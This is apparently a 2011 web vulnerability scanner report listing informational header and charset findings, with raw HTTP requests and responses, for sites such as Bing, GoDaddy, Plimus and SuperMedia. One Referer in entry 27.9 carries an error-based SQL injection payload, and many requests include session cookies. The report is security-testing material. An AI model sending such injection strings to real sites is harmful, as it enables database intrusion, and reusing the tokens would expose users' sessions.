<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
27.3. https://feedback.discoverbing.com/jsinterface.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.discoverbing.com
Path:   /jsinterface.aspx

Request

GET /jsinterface.aspx?op=1&q=dd29 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031; takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; scrx=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 496

spewDrillDown(unescape("        Please%20select%20an%20option    Problem%20finding%20a%20business        Problem%20finding%20a%20business    Problem%20finding%20a%20location        Problem%20finding%20a%20location    Problem%20
...[SNIP]...
27.4. https://secure.shareit.com/shareit/checkout.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Request

POST /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Content-Length: 371
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_CO
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:26 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 69671

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
27.5. https://www.godaddy.com/gdshop/blank.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/blank.htm

Request

GET /gdshop/blank.htm HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
Referer: https://www.godaddy.com/gdshop/hosting/landing.asp?isc=GPASH006&se=%2B&ci=415
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; GoogleADServicesgoogleadwordssearch=cjiapcjcgapjuircrfujthnakaycbjcd; BlueLithium_domainsearch=cjiapcjcgapjuircrfujthnakaycbjcd; traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3DGPASH006%26se%3D%252B%26ci%3D415&isc=GPASH006&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Last-Modified: Sun, 04 Feb 2007 19:59:55 GMT
Accept-Ranges: bytes
ETag: "31a65ca9748c71:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:38 GMT
Content-Length: 0

27.6. https://www.plimus.com/jsp/ajax/buynow_free_email_domain.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.plimus.com
Path:   /jsp/ajax/buynow_free_email_domain.jsp

Request

GET /jsp/ajax/buynow_free_email_domain.jsp?email=d%40df.com HTTP/1.1
Host: www.plimus.com
Connection: keep-alive
Referer: https://www.plimus.com/jsp/buynow.jsp?contractId=1947672
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: contractId=1947672; sessionId=web46250979039532226; JSESSIONID=F8FC4628B8C4E155C25B9BB3292DCBBF; __utmz=254660169.1301159584.2.2.utmcsr=fast-report.com|utmccn=(referral)|utmcmd=referral|utmcct=/bitrix/redirect3.php; __utma=254660169.313124860.1299810311.1299810311.1301159584.2; __utmb=254660169.0.10.1301159584; __utmc=254660169; __utmv=

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:15:52 GMT
Server: Apache
Content-Length: 5
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8

false
27.7. https://www.plimus.com/jsp/buynow.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.plimus.com
Path:   /jsp/buynow.jsp

Request

GET /jsp/buynow.jsp?contractId=1947672 HTTP/1.1
Host: www.plimus.com
Connection: keep-alive
Referer: http://www.fast-report.com/bitrix/redirect3.php?GOTO=https%3A%2F%2Fwww.plimus.com%2Fjsp%2Fbuynow.jsp%3FcontractId%3D1947672%26GID%3DBITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: contractId=2950920; sessionId=web41946268920227930; __utmz=254660169.1299810311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=254660169.313124860.1299810311.1299810311.1299810311.1

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:13 GMT
Server: Apache
Set-Cookie: contractId=1947672; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Set-Cookie: sessionId=web48546432239533572; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 188883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
27.8. https://www.plimus.com/jsp/buynow_analytics.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.plimus.com
Path:   /jsp/buynow_analytics.jsp

Request

GET /jsp/buynow_analytics.jsp?contractId=1947672&arg0=-99&captureFP=N&arg1=web46250979039532226&arg2=true HTTP/1.1
Host: www.plimus.com
Connection: keep-alive
Referer: https://www.plimus.com/jsp/buynow.jsp?contractId=1947672
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: contractId=1947672; sessionId=web46250979039532226; __utmz=254660169.1299810311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=254660169.313124860.1299810311.1299810311.1299810311.1; JSESSIONID=F8FC4628B8C4E155C25B9BB3292DCBBF

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:17 GMT
Server: Apache
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 69784

<html><head>
<script type="text/javascript" language="javascript">
           /*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT
...[SNIP]...
27.9. https://www.supermedia.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help

Request

GET /help HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083834|check#true#1301082034; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:38:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24957


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Help | SuperMedia.com Advertising</title>



...[SNIP]...
27.10. https://www.supermedia.com/help/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/direct-mail

Request

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:38:56 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
27.11. https://www.supermedia.com/help/domains-email  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/domains-email

Request

GET /help/domains-email HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help/direct-mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083845|check#true#1301082045; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:38:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 40501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Domains and Email Help | SuperMedia.com Advertising</title>



...[SNIP]...
27.12. https://www.supermedia.com/help/local-search-marketing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/local-search-marketing

Request

GET /help/local-search-marketing HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=check#true#1301087177|session#1301087116927-461135#1301088977; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 21:08:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 30206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing Help | SuperMedia.com Advertising</title>



...[SNIP]...
27.13. https://www.supermedia.com/help/web-site-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/web-site-design

Request

GET /help/web-site-design HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help/domains-email
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083848|check#true#1301082048; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 29836


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design Help | SuperMedia.com Advertising</title>



...[SNIP]...
27.14. https://www.supermedia.com/spportal/404.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/404.jsp

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:38:54 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20773


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
27.15. https://www2.hbc.com/contactus/contact-us.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.hbc.com
Path:   /contactus/contact-us.asp

Request

GET /contactus/contact-us.asp?langid=en&src=hbc HTTP/1.1
Host: www2.hbc.com
Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10777
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQXCCBAB=MBAOOEFBFOMHLNPDLIHMOMKO; secure; path=/
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 13:51:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
28. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsofttranslator.com
Path:   /Ajax/V2/Widget.aspx

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /Ajax/V2/Widget.aspx?siteData=ncUzpG6DNC3ChU0huEHZCFQbqrzCQRcTVqXdHso8P2KRGM-oFXjoeYwum3D31voFEyqUPj4HjacfvEdrHEyIG8CuATkNhQmRwcZkpGVFjvVnLd1gzFP2dxWEWKdcQtE1&mode=manual&from=en&layout=ts HTTP/1.1
Host: www.microsofttranslator.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=7F6843DC4FE646E9AE270E4CF6963799; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; mstcid=352bfb89; OrigMUID=9C83C8B83DCB480D9837E32DFFAAD691%2c0db7ff218e994793a68b44ecaf2f4b7b; ClientSessionID=27577234-3286-46cb-9bee-5b3f7e387abc; SRCHD=MS=1679828&D=1644355&AF=NOFORM; MUID=9C83C8B83DCB480D9837E32DFFAAD691&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=43200
Content-Type: application/x-javascript; charset=utf-8
X-MS-Trans-Info: s=3640
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:43:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ClientSessionID=27577234-3286-46cb-9bee-5b3f7e387abc; expires=Sun, 02-Mar-2110 02:43:39 GMT; path=/
Set-Cookie: _SS=SID=2DCF47CF4267419084C3BBA97B070558; domain=.microsofttranslator.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.microsofttranslator.com; path=/
Set-Cookie: SRCHD=MS=1699303&D=1644355&AF=NOFORM; expires=Mon, 25-Mar-2013 01:43:39 GMT; domain=.microsofttranslator.com; path=/
Content-Length: 107103

.../* Copyright 2010 Microsoft Corporation */
window['_mstConfig']={appId:'Tz_-tnqAcnp2s1WSWyaNFegugm2Qb8N4bWuf0eVdHNneSXxazIr6VlZ0pl6zQr-i2',baseURL:'http://www.microsofttranslator.com/Ajax/V2/Widge
...[SNIP]...
<meta charset="utf-8"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>
...[SNIP]...
29. HTML does not specify charset  previous  next
There are 41 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

29.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6858
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:13:37 GMT
Expires: Sat, 26 Mar 2011 13:13:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
29.2. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Request

